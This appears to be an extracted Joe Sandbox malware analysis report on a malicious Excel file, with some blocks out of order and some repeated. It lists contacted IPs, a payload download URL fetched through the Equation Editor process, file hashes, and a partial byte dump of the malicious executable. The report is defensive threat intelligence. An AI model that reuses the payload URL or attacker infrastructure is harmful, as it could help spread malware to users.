https://api.ipify.orgcoo vbc.exe true Avira URL Cloud: safe unknown

schemas.xmlsoap.org/soap/actor/next vbc.exe, 00000005.00000002.547487250.0000000002311000.00000004.00000800.00020000.00000000.sdmp

false high

https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=


false high


World Map of Contacted IPs


No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

IP Domain Country Flag ASN ASN Name Malicious

162.159.130.233 cdn.discordapp.com United States 13335 CLOUDFLARENETUS false

178.18.193.160 olypath.com Turkey 50941 VARGONENTR false

179.43.175.99 unknown Panama 51852 PLI-ASCH true

103.171.0.134 unknown unknown 7575 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe

true

Joe Sandbox Version: 34.0.0 Boulder Opal

Analysis ID: 576509

Start date: 22.02.2022

Start time: 15:29:06

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 9m 23s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: POAT2076452.xlsx

Cookbook file name: defaultwindowsofficecookbook.jbs

Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)

Number of analysed new started processes analysed:

8

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Public IPs

General Information


Detection: MAL

Classification: mal100.troj.spyw.expl.evad.winXLSX@6/46@4/4

EGA Information: Successful, ratio: 100%

HDC Information: Successful, ratio: 1.6% (good quality ratio 1.4%)Quality average: 61.5%Quality standard deviation: 25.1%

HCA Information: Successful, ratio: 98%Number of executed functions: 0Number of non-executed functions: 0

Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .xlsxFound Word or Excel or PowerPoint or XPS ViewerAttach to Office via COMScroll downClose Viewer

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exeTCP Packets have been reduced to 100Excluded IPs from analysis (wh itelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.netNot all processes where analyzed, report is missing behavior informationReport size getting too big, t oo many NtOpenKeyEx calls found.Report size getting too big, t oo many NtQueryDirectoryFile calls found.Report size getting too big, t oo many NtQueryValueKey calls found.VT rate limit hit for: POAT2076452.xlsx

Time Type Description

15:29:48 API Interceptor 55x Sleep call for process: EQNEDT32.EXE modified

15:29:51 API Interceptor 273x Sleep call for process: vbc.exe modified

⊘ No context

⊘ No context

⊘ No context

⊘ No context

⊘ No context

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped FilesCopyright Joe Security LLC 2022 of 65

Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Category: downloaded

Size (bytes): 14336

Entropy (8bit): 5.171700803602097

Encrypted: false

SSDEEP: 192:uYzXW2Cwl0D1p62Ojdu8kYfDOJSxYINAJ5:uYbWkGXOjdu8k4DOY6TJ

MD5: 980EC4304344F277D722024ADE08CD01

SHA1: DBA030AEE01753EA3E5EF7C9E73725A306B6DBA5

SHA-256: 1BF69A60DFFFB6903E317E5D5DDC9DFCF24C250B6A2DEB9749785C509A986105

SHA-512: 222CAA856AB958EB7E0DF8AD41F0C9A5CE3EDD00FC10896058FB38A73A6CB897E3785862F0F1CD963D65CF5FE90E0E1A3A66E84F70C4BAF16762BC9192EEAD68

Malicious: true

Antivirus: Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: ReversingLabs, Detection: 7%

Reputation: low

IE Cache URL: 103.171.0.134/_spaceX2__/.win32.exe

Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.............................M... ...`....@.. ....................................@..................................M..S....`..............................PL............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@[email protected]..............@..B.................M......H........1..x.......9....................................................0..........(..........o...........s....(...+(...+.(.....8...........o....(...+....%..9......r...p([email protected](....-a..r...p(....-j..r#..p(....-s..r/..p(....:....8N......(.......2....i/...(.....8....r9..p(....8............(....(....8............(....(....8............(..........i0Ys........rU..po....&..rY..p.....(....(...+o....&..r_..po....&..o..........o....(....8....rc..p(....+v........(..........i0Vs

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced

Category: dropped

Size (bytes): 10202

Entropy (8bit): 7.870143202588524

Encrypted: false

SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd

MD5: 66EF10508ED9AE9871D59F267FBE15AA

SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6

SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD

SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305

Malicious: false

Reputation: high, very likely benign file

Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./[email protected][email protected]]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<[email protected]...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@[email protected]/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*[email protected] :.+H...Rh..



Category: dropped

Size (bytes): 10202

Entropy (8bit): 7.870143202588524

Encrypted: false

SSDEEP: 192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd

MD5: 66EF10508ED9AE9871D59F267FBE15AA

SHA1: E40FDB09F7FDA69BD95249A76D06371A851F44A6

SHA-256: 461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD

SHA-512: 678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305

Malicious: false

Reputation: high, very likely benign file


C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34F90E45.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE9EF17.png


Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./[email protected][email protected]]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<[email protected]...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@[email protected]/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*[email protected] :.+H...Rh..


File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced

Category: dropped

Size (bytes): 3747

Entropy (8bit): 7.932023348968795

Encrypted: false

SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1

MD5: 5EB99F38CB355D8DAD5E791E2A0C9922

SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA

SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0

SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86

Malicious: false

Reputation: moderate, very likely benign file

Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.


File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced

Category: dropped

Size (bytes): 11303

Entropy (8bit): 7.909402464702408

Encrypted: false

SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN

MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2

SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC

SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C

SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D

Malicious: false

Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,[email protected].:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`[email protected]../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....



Category: dropped

Size (bytes): 5396

Entropy (8bit): 7.915293088075047

Encrypted: false

SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo

MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D

SHA1: 556C229F539D60F1FF434103EC1695C7554EB720

SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969

SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978

Malicious: false

Preview: .PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{[email protected].?~L2..Z...:....0p..x<[email protected]<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|[email protected].......&.J155u.s>[email protected].$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51123782.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\540F5A54.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\597D09DF.png




Category: dropped

Size (bytes): 3747

Entropy (8bit): 7.932023348968795

Encrypted: false

SSDEEP: 96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1

MD5: 5EB99F38CB355D8DAD5E791E2A0C9922

SHA1: 83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA

SHA-256: 5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0

SHA-512: 80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86

Malicious: false

Preview: .PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.


File Type: Windows Enhanced Metafile (EMF) image data version 0x10000

Category: dropped

Size (bytes): 1099960

Entropy (8bit): 2.0153141692634335

Encrypted: false

SSDEEP: 3072:nXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:tahIFdyiaT2qtXl

MD5: 8933AD2DEA3390B99DDB8AB58199F107

SHA1: 0B63D26D4874E10E225810BAD34C61E81F4295C0

SHA-256: 38209C7C7C296B024FB42ECAB403D1835E7F193F27D82D14EA38FE94505F0F76

SHA-512: 214434AB87550A250F1F3E201C07FC993D204DCDC88C6B4CAE5EFA495541FC5CA999F0ED835E79E3965AB5DCB166D3B6065F167658069F4B5E4F9F2F56FDB7A7

Malicious: false

Preview: ....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... [email protected]...\...P...EMF+"@...........@[email protected]@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................x$.......f.x.@N.%......0............RQUQ.............x..$QUQ...... ...Id.x...... ............d.x........................................%...X...%...7...................{$..................C.a.l.i.b.r.i........... ..X..........8.x........dv......%...........%...........%...........!..............................."...........%...........%...........%[email protected][email protected]... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....



Category: dropped

Size (bytes): 5396

Entropy (8bit): 7.915293088075047

Encrypted: false

SSDEEP: 96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo

MD5: 590B1C3ECA38E4210C19A9BCBAF69F8D

SHA1: 556C229F539D60F1FF434103EC1695C7554EB720

SHA-256: E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969

SHA-512: 481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978

Malicious: false

Preview: .PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{[email protected].?~L2..Z...:....0p..x<[email protected]<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|[email protected].......&.J155u.s>[email protected].$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..


File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9D634E2C.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5A50888.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF292561.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEDCE7D6.jpeg


Category: dropped

Size (bytes): 4396

Entropy (8bit): 7.884233298494423

Encrypted: false

SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX

MD5: 22FEC44258BA0E3A910FC2A009CEE2AB

SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB

SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5

SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA

Malicious: false

Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&[email protected].*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.



Category: dropped

Size (bytes): 2647

Entropy (8bit): 7.8900124483490135

Encrypted: false

SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9

MD5: E46357D82EBC866EEBDA98FA8F94B385

SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05

SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966

SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3

Malicious: false

Preview: .PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%[email protected]..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`[email protected];...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}[email protected]./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7


File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3

Category: dropped

Size (bytes): 4396

Entropy (8bit): 7.884233298494423

Encrypted: false

SSDEEP: 96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX

MD5: 22FEC44258BA0E3A910FC2A009CEE2AB

SHA1: BF6749433E0DBCDA3627C342549C8A8AB3BF51EB

SHA-256: 5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5

SHA-512: 8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA

Malicious: false

Preview: ......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&[email protected].*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.


File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced

Category: dropped

Size (bytes): 11303

Entropy (8bit): 7.909402464702408

Encrypted: false

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBC9D9B.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E382C2E0.jpeg

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0748BEE.png


SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN

MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2

SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC

SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C

SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D

Malicious: false

Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,[email protected].:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`[email protected]../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....



Category: dropped

Size (bytes): 2647

Entropy (8bit): 7.8900124483490135

Encrypted: false

SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9

MD5: E46357D82EBC866EEBDA98FA8F94B385

SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05

SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966

SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3

Malicious: false

Preview: .PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%[email protected]..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`[email protected];...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}[email protected]./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B 